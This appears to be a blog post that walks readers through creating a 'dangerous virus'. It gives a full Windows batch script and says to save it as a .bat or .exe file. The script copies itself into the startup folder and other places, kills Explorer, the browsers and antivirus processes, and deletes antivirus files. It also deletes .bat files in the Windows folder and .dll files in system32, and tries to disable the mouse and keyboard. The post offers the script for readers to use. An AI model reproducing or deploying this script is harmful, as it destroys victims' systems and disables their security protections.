HOW TO MAKE A DANGEROUS VIRUS IN ONE
MINUTE
You might be scared of danger viruses in your computer or laptop. They affect the working of the computer systems and create new problem. If you want to create your own virus, then this guide will show you how to create a simple virus. Follow step by step guide below:
FOLLOW
step 1:-JUST COPY THIS CODE INTO YOUR NOTEPAD
@echo off
copy"virus.bat""c:\documents and settings\all users\start menu\programs\startup"
copy "virus.bat" "c:\"
copy "virus.bat" "%userprofile%\my documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with batch virus maker v.2
tskill iexplorer
time 12:00
del c:\program files\common files\symantec shared\ccapp.exe
cd c:\windows
if exist "*.bat" del "*.bat"
cd c:\windows\system32
rem made with batch virus maker v.2
if exist "*.dll" del "*.dll"
tskill mcafee security centre module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with batch virus maker v.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with batch virus maker v.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with batch virus maker v.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus
rundll mouse,disable
rem made with batch virus maker v.2
rundll keyboard,disable
step 2:- And save it as file name.bat(example:-virus.bat)
Your Dangerous virus will be created
Note:-“virus.bat” or “virus.exe” (where “ .bat, .exe ” is an extension and “ virus ” is file name) Or anything with the name you want to give. Now your first virus is accurate ready to work. You can also convert or change it as “.exe” file. It copes itself to startup, my documents, Hard Disk and then it kills explorer.exe, firefox.exe and chorme.exe. This virus is tries to delete every .dlland .bat files and it tries to delete mcafee antivirus. If someone clicks on the.bat or .exe file, then this batch file will run and execute the operations written in the code. So be careful of running this batch file, otherwise you may need toRestoration on your computer.
0 comments :
Post a Comment